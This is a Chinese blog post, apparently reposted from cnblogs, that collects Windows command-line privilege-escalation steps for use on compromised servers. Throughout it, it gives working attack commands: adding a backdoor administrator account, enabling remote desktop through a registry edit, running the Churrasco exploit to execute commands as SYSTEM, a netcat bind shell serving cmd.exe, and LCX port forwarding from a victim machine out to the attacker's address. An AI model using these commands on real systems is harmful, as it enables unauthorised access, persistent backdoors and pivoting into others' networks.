码迷,mamicode.com
首页 > 其他好文 > 详细

cmd提权的一些常用命令

时间:2015-06-21 23:44:39      阅读:219      评论:0      收藏:0      [点我收藏+]

标签:

0x00    小菜今天学习了一些windows下的提权,分享一下,以后也方便查看,也请大牛指教

0x01  cmd基本命令(这乃安全工程师必备,如果你不知道,百度google你值得拥有)

net start telnet           开telnet服务(开启服务 service  start XX)

net user            查看所有用户列表

net user hack123 hack123 /add           添加用户hack123密码为hack123

net localgroup administrators hack123 /add   将帐号hack123升级为管理员

开3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

 

0x02  巴西烤肉  简单介绍一下,主要是服务器支持wscript组建,如果不支持就考虑别的方法吧,毕竟那啥,姿势还是要对,不对换一种呗,说一下利用,先上传一个cmd,然后上传巴西烤肉

执行 XXX\XXX\ Churrasco.exe "net user hack123 hack123 /add && net localgroup administrators hack123 /add"  (XXX是路径)

XXX\XXX\ Churrasco.exe "net user admin$ /del"  删除帐号

query user  查看会话

logoff ID号  踢掉

XXX\XXX\ Churrasco.exe "logoff 1" 

0x03  NC反弹

路径\nc.exe -l -p 端口 -t -e 路径\cmd.exe

XXX\XXX\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe

NC上传

DOS界面下运行:

NC -vv url 80<1.txt

-vv: 回显


80: web端口

1.txt: 就是你要发送的数据包

0x04  LCX端口转发

先本地监听X端口 lcx.exe -listen X 3389

c:\recycler\lcx.exe -slave 自己的ip X 肉鸡IP 3389    LCX转发

c:\recycler\lcx.exe -slave 202.134.12.12 X 123.123.4.4 3389

 

cmd提权的一些常用命令

标签:

原文地址:http://www.cnblogs.com/hack0ne/p/4592536.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!